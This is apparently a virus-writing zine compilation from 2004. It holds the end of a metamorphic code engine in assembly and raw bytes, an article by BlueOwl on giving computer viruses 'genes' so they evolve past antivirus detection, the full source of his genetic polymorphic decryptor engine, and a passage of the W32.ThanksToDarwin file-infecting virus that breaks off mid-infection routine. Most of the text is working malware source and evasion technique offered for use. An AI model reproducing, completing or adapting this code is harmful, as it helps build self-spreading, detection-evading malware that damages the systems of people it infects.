add/or/adc/sbb/and/sub/xor/cmp r/m,r/m rcr edx, 1 ; rand true/false jc .nomorph cmp al, 11000000b .nomorph: jb op_rm ; (jc == jb so little optimization) lodsb xor al, 00000010b stosb lodsb and eax, 00111111b ; 00000000 00regreg shl eax, 5 ; 00000reg reg00000 shr al, 2 ; 00000reg 00reg000 or al, ah ; 00000xxx 00regreg or al, 11000000b ; 11regreg stosb ret branch_1xxxxxxx:shl al, 1 jc branch_11xxxxxx branch_10xxxxxx:shl al, 1 jc branch_101xxxxx branch_100xxxxx:shl al, 1 jc branch_01xxxxxx.ncjump ; -> xchg eax,reg/cwde/cdq/pushf/popf/sahf/lahf branch_1000xxxx:cmp al, 01000000b jae op_rm ; -> test/xchg/mov/lea/pop r/m(,r/m) shl al, 3 jc op_rmimm8 ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,imm8 jmp op_rmimm32 ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,imm32 branch_101xxxxx:shl al, 1 jc branch_1011xxxx branch_1010xxxx:and al, 11100000b cmp al, 00100000b jb op_eax ; -> test eax, imm cmp al, 10000000b jz do_5byte ; -> mov mem32, eax movsb ret ; -> movs/stos/lods/scas branch_1011xxxx:shl al, 1 jnc branch_1100001x.2byte ; -> mov reg, imm8 jmp op_eax.pr32 ; -> mov reg, imm32 do_5byte: movsd movsb ret branch_11xxxxxx:shl al, 1 jc branch_111xxxxx branch_110xxxxx:shl al, 1 jc branch_1101xxxx branch_1100xxxx:cmp al, 11010000b jz branch_1100001x.2byte ; -> int imm8 shl al, 1 jc branch_1100001x.done ; -> leave/int 3 branch_11000xxx:shl al, 1 jc op_rm_w ; -> mov r/m, imm branch_110000xx:shl al, 1 jc branch_1100001x inc ecx ; -> rol/ror/rcl/rcr/shl/shr/sal/sar reg, 1 jmp op_rm branch_1100001x:shl al, 1 jc .done .3byte: movsb .2byte: movsb ; -> ret imm16 .done: movsb ret ; -> ret branch_1101xxxx:shl al, 2 jc branch_1100001x.done ; -> xlatb branch_1101x0xx:jmp op_rm ; -> rol/ror/rcl/rcr/shl/shr/sal/sar reg, 1 branch_111xxxxx:shl al, 1 jc branch_1111xxxx branch_1110xxxx:shl al, 1 jnc branch_11101010 ; -> loop label branch_11101xxx:cmp al, 00100000b jz branch_111010x0.done ; -> call label branch_111010x0:shl al, 2 jc branch_11101010 .done: movsd ; -> jmp label32 movsb ret branch_11101010:movsb movsb ret ; -> jmp label8 branch_1111xxxx:shl al, 1 jc branch_11111xxx branch_11110xxx:shl al, 2 jnc branch_11111xxx.done ; -> cmc branch_11111x1x:mov al, [esi+1] ; al = modr/m and al, 00111000b jnz op_rm ; -> not/mul/div/idiv jmp op_rm_w ; -> test branch_11111xxx:shl al, 1 jc .done ; -> clc/stc/cli shr al, 1 jc op_rm ; -> inc/dec/call/jmp/push .done: movsb ret ; -> cld/std ; ----------------------------------------------------------------------- op_rm_w: mov al, [esi] shr al, 1 jnc op_rmimm8 op_rmimm32: add ecx, ebx ; imm length will be 4 or 2 dec ecx op_rmimm8: inc ecx ; imm length = 1 byte op_rm: movsb lodsb stosb cmp al, 11000000b ; op reg, reg jae .done mov ah, al and al, 111b shr ah, 6 jz .regaddr cmp ah, 00000001b jz .ddone add ecx, 3 ; op reg, [reg+dword] .ddone: inc ecx ; op reg, [reg+byte] .cmpsib: cmp al, 00000100b jnz .done xor ebx, ebx mov eax, ebx lodsb ; 00000000 iiregreg shl eax, 2 ; 000000ii regreg00 xchg bl, ah ; 00000000 regreg00 shl eax, 3 ; 00000reg reg00000 shr al, 5 ; 00000reg 00000reg cmp ah, 4 jz .randindex cmp al, 4 jz .nosib or bl, bl ; index = 1? jnz .nosib rcr edx, 1 jnc .nosib ; randomly abort switch xchg al, ah jmp .nosib .randindex: mov bl, dl ; index is random and bl, 00000011b .nosib: shl al, 5 ; 00000reg reg00000 shr eax, 3 ; 00000000 regreg00 mov ah, bl ; 000000ii regreg00 shr eax, 2 ; 00000000 iiregreg stosb .done: rep movsb ret .regaddr: cmp al, 00000101b ; op reg, [dword] jnz .cmpsib movsd jmp .done ; ÄÄÄÄÄÄÄÄÄÄÄÄÄ META BINARY ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; in: esi(ecx) = start of code to morph ; edi(ecx) = start of buffer to put morphed code in ; ecx = size of code to morph (and buffer) ; out: esi = esi + ecx ; edi = edi + ecx ; other registers are destroyed (except esp) BLM: db 252,141,28,14,83,49,201,106,4,91,232,13,0,0,0,91 db 193,194,7,102,247,218,57,243,119,234,195,164,138,6,36,231 db 60,38,116,247,138,6,36,254,60,100,116,239,60,242,116,235 db 60,102,117,4,179,2,235,227,138,6,60,15,117,19,164,10 db 6,60,143,116,6,60,191,116,5,235,4,164,164,164,164,164 db 195,208,224,114,75,208,224,114,20,192,224,4,115,31,138,6 db 208,232,114,3,164,164,195,1,217,243,164,164,195,60,192,114 db 1,164,60,104,116,95,60,106,117,1,170,164,195,138,70,1 db 209,218,114,2,60,192,15,130,179,0,0,0,172,52,2,170 db 172,131,224,63,193,224,5,192,232,2,8,224,12,192,170,195 db 208,224,114,52,208,224,114,23,208,224,114,198,60,64,15,131 db 139,0,0,0,192,224,3,15,130,129,0,0,0,235,124,208 db 224,114,12,36,224,60,32,114,149,60,128,116,8,164,195,208 db 224,115,37,235,146,165,164,195,208,224,114,38,208,224,114,27 db 60,208,116,20,208,224,114,17,208,224,114,73,208,224,114,3 db 65,235,76,208,224,114,2,164,164,164,195,192,224,2,114,249 db 235,61,208,224,114,19,208,224,115,12,60,32,116,5,192,224 db 2,114,3,165,164,195,164,164,195,208,224,114,14,192,224,2 db 115,17,138,70,1,36,56,117,22,235,10,208,224,114,4,208 db 232,114,12,164,195,138,6,208,232,115,3,1,217,73,65,164 db 172,170,60,192,115,76,136,196,36,7,192,236,6,116,70,128 db 252,1,116,3,131,193,3,65,60,4,117,54,49,219,137,216 db 172,193,224,2,134,220,193,224,3,192,232,5,128,252,4,116 db 16,60,4,116,17,8,219,117,13,209,218,115,9,134,196,235 db 5,136,211,128,227,3,192,224,5,193,232,3,136,220,193,232 db 2,170,243,164,195,60,5,117,191,165,235,246 ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

articles

Implementing genetic algorithms in virusses BlueOwl Implementing genetic algorithms in virusses by BlueOwl @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Introduction ************ I have personally always been fascinated by evolution and am a strong believer that it is the truth about how organisms evolve. I have also spend many thoughts and codes and readings trying to figure out if it could also be implemented in computer virusses, of course something completely different. Normally computer virusses either don't change them selves (static), they encrypt themselves with one or multiple decryptors or they completely change their body (hard to do). With the second and the third way virusses try to completely change their layout / code use / register use etc.This theory will try to prove that another way could be better. !Note! In this theory I mainly describe how a fileinfecting virus could use genetics. This can however be applied to any spreading program including worms, as long as you can be creative. Darwinian evolution - theory **************************** Ok, so in short. What is Darwinian evolution? Let assume we have one species, let us say dogs. And lets assume that they are put in the jungle without humans around. You probably know there are lots of different dogs. Small, thin, big with long/small tales large/small beaks etc. etc. So all these different ones are dumped into the jungle. Some would die because they could not find something to eat. Some because they were caught and eaten by lions. Some would fall and drown in rivers. Etc. But as you could imagine: From all those tens of thousands of dogs a few would still probably survive, because they were best adapted to the jungle. These remaining dogs would then mate and produce offspring. Some of these new dogs would be better adjusted to the environment, some worse. So some of this new generation would die but a lot of them would not, because they resembled their dog parents which *could* survive. With Darwinian evolution it is all about this. The strongest survive, and the offspring of these strongest will survive event better or worse. Ultimately creating the "perfect" species. So in short *********** Okay, so reading from the text above there are x core factors: - Each individual has a certain DNA which depends what it is, small thin, with long hair/short hair etc. - The environment kills individuals with certain characteristics, for example some dogs have long legs to run fast with so they can outrun lions, the ones with short legs are killed and eaten. - Dogs which *do* survive because of their positive characteristics will produce offspring which resembles them, thus they have a lot of the same characteristics but with a small number of changes. These changes will depend whether this individual will do better or worse than its parents. Binary organisms **************** This theory said, lets talk about modern computer virusses and evolution theory. What's the use of genetics in computer virusses? In the virus world, of course, there are no "natural" enemies. No lions, rivers, etc. etc. There is only one enemy: antivirusses. When an antivirus finds a virus, it will be removed. Killed. To detect virusses antivirusses have 2 ways: virus specific and virus unspecific (heuristic). The first method means a virus on the loose is 'caught'. Someone who is infected by it and sends it over to antivirus offices for analysing. It will get fully or partially analysed by antivirus personnel and a detection routine for it is generated. This is sent to all people owning the antivirus and thus they become 'immune' to the virus. The second way for detecting virusses in general is for the antivirus to check for virus-like signs and suspicious things. What kind of things are suspicious and what things are not have been decided by the software authors. Some virusses will not get detected though, because they don't match the 'description'. The programmer cannot add an unlimited number of 'recognisers' because the more he adds the higher the chance will be a non-virus will fit the description. Binary and biologic: the connection *********************************** First let us talk about unspecific detection. With this detection virusses are detected on what they do. The antivirus can detect them on the changes they make to files they infect. But as I said before: Some virusses *do not* get detected. This is of course because each virus can have its own way of doing it. If we would compare this with a dog with long or short legs, we get a remarkably good comparison. If a dog has short legs he dies, and with long legs he survives. If a virus has one way of infecting it gets detected, if it uses another it does not. So what way is best for the virus to use? That's unknown. Just like a dog with short or long legs does not *know* if it will survive, a virus won't either. For the dog species in total it is not a problem. Some dogs will die but new dogs will take their places. For a virus species it *is* a problem. Simply because there are no different kinds of one virus. Even if the virus is polymorphic (self changing), it will still be a problem because a polymorphic virus survivor has no way of 'knowing' what combination worked. So it would be like a long-legged parent getting both long-legged and short-legged offspring. Here comes the idea of genetics and DNA for virusses to mind. What if the virus could 'remember' what kind of infection it did and pass it on with some slight modifications to its children. If it did that it could truly evolute like the dogs would. The same goes for specific detection. Let us say the antivirus researcher analyses the virus and finds a kind of infection. It is added to the virus database and all virusses using that kind will be detected and removed. Virusses using another one because of other DNA won't be removed and will take the place of the previous virus sample. That way virus evolution is complete: as long as not *ALL* virus samples have been added to the detection database, some will escape detection, live on and breed. Genetic algorithms ****************** Genetic algorithms can be considered reasonably simple with a few things maybe harder to understand (and code). The structure of the, in my opinion, best genetic engine would be (explained later): For each file to infect: 1) Save virus DNA 2) Mutate virus DNA 3) Infect file 4) Restore virus DNA Firstly let us talk about the infection of the file. In this routine every possible genetic step (*) is made in the way of: > if (stepxgene==0){ do first way } else { do second way } To make the process more efficient it is the easiest to give all steps a fixed number of possibilities, Fe. all four possibilities. This will help in determining the way you are going to -store- the DNA. If you are thinking about multiple DNA steps per byte I would encourage you to use a number in the range of 2^... so you can use the maximum number of bits available. The save/mutate/restore may be a little bit harder to understand why it is done. The ultimate reason is the fact that this way the file will be infect according to DNA of the virus's OFFSPRING. That way the offspring 'knows' *exactly* what it consists of. If the virus would only give its copy a mutated DNA under infection evolution would stay behind a little. Fe. A virus has DNA A and infects a file in way A but gives its copy DNA B. Also a problem is the fact that all files infected by one virus will be infected in exactly the same way. And you don't see all the puppies of a dog look the same. Selecting appropriate genes *************************** What to make genetic and what not is another topic to think about and it is debatable. The real question is whether or not something is useful to be genetic. Fe. human hair colour is genetic, but fingerprints are even with one-egg twins different. Finger prints were in through the evolution of man clearly of no importance. You can add anything which you like to make genetic, but a problem comes up when you have something like: if(gene==0){ ... if (anothergene==0){ ... } else { ... } ... } else { ... if (yetanothergene==0){ ... } else { ... } ... } Of course it is possible, but when you look at it more closely you will notice that the importance of a gene declines, f.e.: if (...){ if (...){ if (...){ ... } ..}..} If the first "if" gene will mutate all the inner genes won't get executed anymore, and a much bigger adaptation is made than when an inner gene is changed. So to be 'fair' you would have to make the chance of mutation smaller on more important genes. It is a problem which you can live with but I would recommend trying to avoid it and keeping it in this format: if (...) { ... } ... if (...) { ... } ... if (...) { ... } ... ... Furthermore, do not get carried away when creating genes. I mean do not create a self destruct gene. ;) And make sure all options are compatible! The best way to test for this is to put all genes first to zero, than to one etc. to the end number of different options. You can't test all combination individually anyway. Mutations ********* Mutations are the essence of evolution. Without it, of course, everything would stay the same. So the engine should make a change sometimes. However this is another thing to think about: How often should something be changed? If too much is changed virusses could be completely different to soon and the effect of evolution lost. But if it changed too slow it could be not variable enough to escape detection and come up with new ways. Anyway, it is debatable. Furthermore, the number of possible mutations shouldn't also be static. So to stick to nature, every gene should independently have a certain chance of changing. My algorithm is (ASM): call rand ; eax = random xchg eax, edx ; (each bit has a chance of 1 in 2 to be 1) call rand ; eax = random and edx, eax ; chance 1 in 4 call rand and edx, eax ; chance 1 in 8 call rand and edx, eax ; chance 1 in 16 call rand and edx, eax ; chance 1 in 32 So in this example, at the end, every bit in edx has a chance of one in thirty-two to be 1; while all others are zero. Thus because a dword consists out of 32 bits, the average should be one bit 1 each time at the end of this proc. However 0, 2, 3, 4 ... 32 bits 1 are also possibilities, but the chance 32 bits are 1 is a number of one in 48 digits. So we are save to assume too big mutations will almost never happen. So after getting this value we simply xor it with the dna (given the fact it only consists out of one dword). Giving a small number or no mutations. xor [dna], edx Code example ************ To give and example of how this *could* be implement I have coded this simple polymorphic engine. Actually it is not *that* simple and may be hard to understand, since I optimized most things about it. It has 2 parts which contain genetics. A DNA variable (called DNA), and a register container. These are firstly saved at the start of the engine and then the originals are altered. Then it generates a decryptor according to these. The decryptor is then generated in the following way: All parts of the decryptor have four possible options (see the part under <call load_table>). So from the DNA each time 2 bits (can be 0,1,2,3) are read and used to pick the correct genetically specified option. If you check this out maybe you will learn some new techniques, but don't try to understand it too much :) (blame my coding style ;)). Final Word ********** First of all, I hope you have enjoyed reading my article. As i am very interested in the subject myself, i liked to write something about this. I have already read other people thinking and writing about this subject, and i like it. I also hope this will enspire you to do new things with your codings, even completely different. This is not *necessarily* the best idea. BlueOwl november 2004 ; ¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤ ; BGPE - BlueOwls Genetic Poly Engine (Simple version) ; Al though this is just a "simple" version, feel free to spread and ; use it in whatever you like, as long as you don't hold me responsible ; AND don't claim it is yours. :) What i was thinking about adding was ; placing all the code blocks in random order, maybe something for a ; next version ;). ; Good luck with it. ; BlueOwl ; BTW. Sorry for not commenting this much, but personally ; in: eax = rnd ; ecx = size of virus in bytes rounded to a dword ((virus_size+3)/4)*4 ; esi = start of virus ; edi = start of outputbuffer ; ; out: eax = size of generated ptr_low equ 0 shl 3 + 6 ptr_high equ 1 shl 3 + 6 ctr_low equ 2 shl 3 + 6 ctr_high equ 3 shl 3 + 6 tmp_low equ 4 shl 3 + 6 ptrtmp equ 5 shl 3 + 6 ptrptr equ 6 shl 3 + 6 ctrctr equ 7 shl 3 + 6 cjmp equ 8 shl 3 + 6 mlbl equ 9 shl 3 + 6 edword equ 10 shl 3 + 6 ebyte equ 11 shl 3 + 6 size_dword equ 12 shl 3 + 6 tmptmp equ 13 shl 3 + 6 ecd equ 14 shl 3 + 6 estart equ ebp-4*1 rna equ ebp-4*2 vsized equ ebp-4*3 lbler equ ebp-4*4 _edword equ ebp+7*4 _ebyte equ ebp-4*5 BGPE: pushad call inner_delta inner_delta: pop ebp push dword [ebp+bgpe_dna-inner_delta] ; save old dna push dword [ebp+lregsstart-inner_delta] ; save old registeruse push dword [ebp+lregsstart+4-inner_delta] ; " " push ebp push ecx lea ecx, [ebp+lregsstart-inner_delta] lea ebx, [ebp+bgpe_dna-inner_delta] mov ebp, esp add ebp, 4 call bgpe_rand xchg edx, eax call bgpe_rand and edx, eax call bgpe_rand and edx, eax call bgpe_rand and edx, eax ; chance 1 in 16 for each bit xor [ebx], edx push 7 pop edx xchg ecx, edx mutate_regs: call bgpe_rand test eax, 0111b ; chance of 3 bits being 0 in 8 jnz no_mut mov al, byte [edx] ; swap around register mov byte [edx+1], al no_mut: inc edx loop mutate_regs pop ecx mov al, 0e8h stosb mov eax, ecx stosd push edi shr ecx, 2 db 068h bgpe_dna dd 0 ; 01010101010101010101010101010101b push ecx push eax rep movsd call bgpe_rand push eax call load_table getptr: gp1 db gp2-gp1,ptr_low,58h,ptr_low,50h ; pop reg / push reg gp2 db gp3-gp2,08bh,ptr_high,04h,024h ; mov reg, [esp] gp3 db gp4-gp3,0ffh,034h,024h,ptr_low,058h ; push [esp] / pop reg gp4 db gp5-gp4,00bh,ptr_high,04h,024h,023h,ptr_high,04h,024h ; or reg, [esp] / and reg, [esp] gp5: initcnt: ic1 db ic2-ic1,ctr_low,0b8h,size_dword ; mov reg, value ic2 db ic3-ic2,068h,size_dword,ctr_low,058h ; push value / pop reg ic3 db ic4-ic3,083h,ctr_low,0e0h,000h,081h,ctr_low,0c0h,size_dword ; and reg, 0 / add reg, value ic4 db ic5-ic4,08dh,ctr_high,005h,size_dword ; lea reg, [value] ic5: getdword: gd1 db gd2-gd1,mlbl,087h,ptrtmp,0 ; xchg reg, [reg] gd2 db gd3-gd2,mlbl,0ffh,ptr_low,030h,tmp_low,058h ; push [reg] / pop reg gd3 db gd4-gd3,mlbl,08bh,ptrtmp,0 ; mov reg, [reg] gd4 db gd5-gd4,mlbl,00bh,ptrtmp,000h,023h,ptrtmp,000h ; or reg, [reg] / and reg, [reg] gd5: decryptdword: cy1 db cy2-cy1,08dh,tmptmp,080h,edword,0c1h,tmp_low,0c0h,ebyte,ecd ; lea reg, [reg+value] / rol reg, value push ecx movzx ecx, byte [_ebyte] ror eax, cl pop ecx sub eax, [_edword] ret cy2 db cy3-cy2,0c1h,tmp_low,0c8h,ebyte,0f7h,tmp_low,0d8h,ecd ; ror reg, value / neg reg neg eax push ecx movzx ecx, byte [_ebyte] rol eax, cl pop ecx ret cy3 db cy4-cy3,0fh,tmp_low,0c8h,081h,tmp_low,0f0h,edword,ecd ; bswap reg / xor reg, value xor eax, [_edword] bswap eax ret cy4 db cy5-cy4,081h,tmp_low,0e8h,edword,0f7h,tmp_low,0d0h,ecd ; sub reg, value / not reg not eax add eax, [_edword] ret cy5: putdword: pd1 db pd2-pd1,087h,ptrtmp,0 ; xchg [reg], reg pd2 db pd3-pd2,tmp_low,050h,08fh,ptr_low,000h ; push reg / pop [reg] pd3 db pd4-pd3,089h,ptrtmp,0 ; mov [reg], reg pd4 db pd5-pd4,021h,ptrtmp,000h,009h,ptrtmp,000h ; and [reg], reg / or [reg], reg pd5: addptr: ap1 db ap2-ap1,08dh,ptrptr,040h,004h ; lea reg, [reg+4] ap2 db ap3-ap2,083h,ptr_low,0c0h,004h ; add reg, 4 ap3 db ap4-ap3,083h,ptr_low,0e8h,0fch ; sub reg, -4 ap4 db ap5-ap4,ptr_low,040h,ptr_low,040h,ptr_low,040h,ptr_low,040h ; 4* inc reg ap5: decctr: dc1 db dc2-dc1,ctr_low,048h ; dec reg dc2 db dc3-dc2,083h,ctr_low,0e8h,001h ; sub reg, 1 dc3 db dc4-dc3,083h,ctr_low,0c0h,0ffh ; add reg, -1 dc4 db dc5-dc4,08dh,ctrctr,040h,0ffh ; lea reg, [reg-1] dc5: conjmp: cj1 db cj2-cj1,009h,ctrctr,0c0h,074h,002h,0ebh,cjmp ; or reg, reg / jz $+4 / jmp label cj2 db cj3-cj2,ctr_low,040h,ctr_low,048h,075h,cjmp ; inc reg / dec reg / jnz label cj3 db cj4-cj3,083h,ctr_low,0f8h,001h,073h,cjmp ; cmp reg, 1 / jnb label cj4 db cj5-cj4,ctr_low,048h,078h,003h,ctr_low,040h,079h,cjmp ; dec reg / js $+3 / inc reg / jns label cj5: doret: rt1 db rt2-rt1,0c3h ; ret rt2 db rt3-rt2,0c2h,000h,000h ; ret 0 rt3 db rt4-rt3,058h,0ffh,0e0h ; pop eax / jmp eax rt4 db rt5-rt4,0ffh,034h,024h,0c2h,004h,00h ; push [esp] / ret 4 rt5: db 0 load_table: pop edx call load_regs lregsstart db 00h,01h,02h,03h,05h,06h,07h load_regs: pop ebx do_decryptor: cmp byte [edx], 0 jz decryptor_done mov esi, edx push 4 pop ecx _reloadnext: movzx eax, byte [edx] add edx, eax loop _reloadnext mov ecx, [rna] shr dword [rna], 2 ; move up rna and ecx, 011b ; put ecx in range 0-3 or ecx, ecx jz this_found _loadthis: movzx eax, byte [esi] add esi, eax loop _loadthis this_found: movzx ecx, byte [esi] dec ecx inc esi process_table: lodsb push eax and eax, 07h cmp eax, 06 pop eax jz special_command or al, ah stosb sub ah, ah resume_process: loop process_table jmp do_decryptor special_command:movzx eax, al ; process special command do_command: shr eax, 3 ; (make label/add register/etc.) push edx call getsptrs sptrs: db do_ptr_low-sptrs,do_ptr_high-sptrs,do_ctr_low-sptrs,do_ctr_high-sptrs db do_tmp_low-sptrs,do_ptrtmp-sptrs,do_ptrptr-sptrs,do_ctrctr-sptrs db do_docjmp-sptrs,do_mlbl-sptrs,do_edword-sptrs,do_ebyte-sptrs db do_size_dword-sptrs,do_tmptmp-sptrs,do_ecd-sptrs getsptrs: pop edx mov al, byte [edx+eax] ; select the appropiate handler add edx, eax sub eax, eax call edx pop edx jmp resume_process ; from here on different handlers do_ecd: push edx edi xchg esi, edx mov ecx, [vsized] mov esi, [estart] mov edi, esi _encrypt: lodsd call edx stosd loop _encrypt push 1 pop ecx pop edi edx ret do_ptr_high: mov ah, [ebx+0] ; fix registers shl ah, 3 ; ... ret do_ctr_high: mov ah, [ebx+1] shl ah, 3 ret do_tmptmp: mov ah, [ebx+2] shl ah, 3 do_tmp_low: or ah, [ebx+2] ret do_ptrtmp: mov ah, [ebx+2] shl ah, 3 jmp do_ptr_low do_ptrptr: mov ah, [ebx+0] shl ah, 3 do_ptr_low: or ah, [ebx+0] ret do_ctrctr: call do_ctr_high do_ctr_low: or ah, [ebx+1] ret do_docjmp: mov eax, [lbler] ; calculate jump difference sub eax, edi dec eax stosb ret do_mlbl: mov [lbler], edi ret do_edword: mov eax, [_edword] jmp store_zero do_size_dword: mov eax, [vsized] store_zero: stosd sub eax, eax ret do_ebyte: mov al, [_ebyte] stosb ret decryptor_done: mov esp, ebp pop ebp pop dword [ebp+lregsstart+4-inner_delta] ; restore old stuff pop dword [ebp+lregsstart-inner_delta] ; pop dword [ebp+bgpe_dna-inner_delta] ; mov [esp+4*7], edi popad sub eax, edi ret bgpe_rand: mov eax, [ebp+7*4] rol eax, 7 neg ax add eax, 0B78F23A5h ; just a number xor [ebp+7*4], eax ; save for later ret ; ¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤=÷=¤ ; Copyright BlueOwl 2004 ; Have a nice time. EOF.

sources

W32.ThanksToDarwin BlueOwl ; W32.ThanksToDarwin by BlueOwl ; --------------------------------------------------------------------- ; ; W32.ThanksToDarwin is my first genetic polymorphic virus. Unlike normal poly- ; morphic virusses which generate their decryptors at random, this virus ; will use its genes to do so and only a few adaptations are made each ; time to genes. This way, its offspring will look like it and thus ; inherit the genes that made it survive. All thanks to Darwinian - ; evolution :). ; ; Disclaimer: I do mention how fun it is to assemble and try this out ; a few times in this article. I am not responsible for any ; loss though. I did my best. ; ; Results with (not yet updated) antivirus scanners in my tests: ; 1st generation detection: 100% ; 2nd generation detection: 70% ; 3rd generation detection: 5% ; 4rd generation detection: 4% ; (no difference after this) ; ; Because of the gene-giving even if only a small fraction survived their ; offspring would infect good because they 'know what worked'. ; ; Details: - Kan produce 268435456 different decryptors and 65536 different ; encryptions. In all, 17592186044416, different virusses. Leave ; it up to evolution to find that perfect one! ; - Infection mark = milliseconds and seconds of the creation date ; set to zero ; - Does not restore the original files dates on purpose: file - ; checkers that see the file has been changed will sooner alert ; when the program date did not change, as this is typical virus ; behaviour ; - Will only infect the current directory so if you like you can ; try the virus without having to fear getting your whole computer ; infected ; - On some points, the virus could do a lot better, I just didn't ; feel like making it that good. I hope you are inspired to make ; a genetic virus which is lots better though. ; ; Note: if you choose to assemble it please note that the 1st generation ; will crash when it tries to return to the original host (because ; there is none ;)). ; ; Thanks to: Docter Ludwig for his book "The big black book of ; computer virusses", with some data about genetic ; virusses in the DOS days. ; ; Assemble with FASM (http://www.flatassembler.net) ; ; ; 17-3-2004 Note: After this version I made lots of other (unpublished, ; yet?) virusses but I decided to publish this anyways as people ; might learn something from it anyways. The api finding and ; everything is very old school, but just remember it was ; one of my first stupid pe-virusses. I also gave this virus ; a better RNG. ; ; --------------------------------------------------------------------- ; I'm sorry for not commenting it much include '%fasminc%/win32ax.inc' ; Simple equates gzero equ db 0ACh,08h,0C0h,75h,0FBh virus_size equ (end_of_virus-start_of_virus) genes_count equ (mgenes_end-mutate) ; Apis FindFirstFile equ [ebp+(_FindFirstFile-delta)] FindNextFile equ [ebp+(_FindNextFile-delta)] FindClose equ [ebp+(_FindClose-delta)] CreateFile equ [ebp+(_CreateFileA-delta)] ReadFile equ [ebp+(_ReadFile-delta)] WriteFile equ [ebp+(_WriteFile-delta)] CloseHandle equ [ebp+(_CloseHandle-delta)] GlobalAlloc equ [ebp+(_GlobalAlloc-delta)] GlobalLock equ [ebp+(_GlobalLock-delta)] GlobalUnlock equ [ebp+(_GlobalUnlock-delta)] GlobalFree equ [ebp+(_GlobalFree-delta)] SetFileAttributes equ [ebp+(_SetFileAttributes-delta)] FileTimeToLocalFileTime equ [ebp+(_FileTimeToLocalFileTime-delta)] FileTimeToSystemTime equ [ebp+(_FileTimeToSystemTime-delta)] SystemTimeToFileTime equ [ebp+(_SystemTimeToFileTime-delta)] LocalFileTimeToFileTime equ [ebp+(_LocalFileTimeToFileTime-delta)] SetFileTime equ [ebp+(_SetFileTime-delta)] GetProcAddress equ [ebp+(getprocaddr-delta)] start_of_virus: virus_start: mov edx, 12345678h ; this will be filled with the- call delta ; decryptor size delta: pop ebp mov eax, ebp sub eax, edx sub eax, (delta-virus_start) sub eax, 12345678h NEIP: NewEIP equ (NEIP-4) add eax, 12345678h OEIP: OldEIP equ (OEIP-4) mov [ebp+(return_addr-delta)], eax mov esi, [esp] sub si, si mov ecx, 20h loop_mz: cmp word [esi], 'MZ' je got_k32 sub esi, 1000h loopne loop_mz jmp goto_host got_k32: mov edx,esi mov [ebp+(k32-delta)], edx mov ebx, [esi+03Ch] add ebx, esi cmp word [ebx], 'PE' je kernel_ok jmp goto_host kernel_ok: mov ebx, [ebx+078h] add ebx, esi mov eax, [ebx+020h] add esi, eax xor ecx, ecx searchexport: lodsd add eax, edx push esi mov esi, eax lodsd cmp eax, 'GetP' jne cagain lodsd cmp eax, 'rocA' jne cagain pop esi jmp got_procaddr cagain: pop esi inc ecx cmp ecx,[ebx+018h] jle searchexport jmp goto_host got_procaddr: mov esi,[ebx+01Ch] add esi,edx inc ecx addj: lodsd add eax,edx loop addj done: mov [ebp+(getprocaddr-delta)],eax lea esi, [ebp+(k32_apis-delta)] get_apis: push esi push [ebp+(k32-delta)] call GetProcAddress mov ebx, eax gzero mov edi, esi mov eax, ebx stosd mov esi, edi mov al, [esi] or al, al jnz get_apis pushad lea edi, [ebp+(cpy-delta)] lea esi, [ebp+(mutate-delta)] mov ecx, (mutateend-mutate) rep movsb popad push 314d push GMEM_MOVEABLE call GlobalAlloc or eax, eax jz goto_host mov [ebp+(findmem_handle-delta)], eax push eax call GlobalLock mov [ebp+(findmem-delta)], eax push eax lea eax, [ebp+(search_mask-delta)] push eax call FindFirstFile mov [ebp+(find_handle-delta)], eax inc eax jz search_end infect_file: mov eax, [ebp+(findmem-delta)] lea eax, [eax+4] lea ebx, [ebp+(filetime-delta)] push ebx push eax call FileTimeToLocalFileTime lea eax, [ebp+(systemtime-delta)] push eax lea ebx, [ebp+(filetime-delta)] push ebx call FileTimeToSystemTime mov ax, [ebp+(smsecond-delta)] cmp ax, 0 jne host_ok mov ax, [ebp+(ssecond-delta)] cmp ax, 0 je already_infected host_ok: mov [ebp+(smsecond-delta)], 0 mov [ebp+(ssecond-delta)], 0 call infection already_infected: push [ebp+(findmem-delta)] push [ebp+(find_handle-delta)] call FindNextFile or eax, eax jnz infect_file push [ebp+(find_handle-delta)] call FindClose search_end: push [ebp+(findmem_handle-delta)] call GlobalUnlock push [ebp+(findmem_handle-delta)] call GlobalFree or ebp, ebp jz skip_jump goto_host: push [ebp+(return_addr-delta)] skip_jump: ret ; ----------------------------------------------------------------------------------- infection: push 0 push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 0 push FILE_SHARE_READ push GENERIC_READ mov ebx, [ebp+(findmem-delta)] add ebx, 44 push ebx call CreateFile mov [ebp+(file_handle-delta)], eax mov edx, eax inc eax jz return_infect ; can't open mov eax, [ebp+(findmem-delta)] mov eax, [eax+32] add eax, (virus_size+600) ; make some room (+600 to be sure) push eax push GMEM_MOVEABLE call GlobalAlloc or eax, eax jz close_file ; can't allocate mov [ebp+(filemem_handle-delta)], eax push eax call GlobalLock mov [ebp+(filemem-delta)], eax push 0 lea ebx, [ebp+(NBR-delta)] push ebx mov eax, [ebp+(findmem-delta)] push dword [eax+32] push [ebp+(filemem-delta)] push [ebp+(file_handle-delta)] call ReadFile or eax, eax jz close_mem push [ebp+(file_handle-delta)] call CloseHandle mov eax, [ebp+(filemem-delta)] mov esi, [eax+3Ch] add esi, eax ; get pointer to pe header cmp dword [esi], "PE" jne close_mem mov eax, [esi+3Ch] mov [ebp+(file_align-delta)], eax mov edi, esi movzx eax, word [edi+06h] dec eax imul eax,eax,28h ; * 28 add esi,eax ; add esi,78h 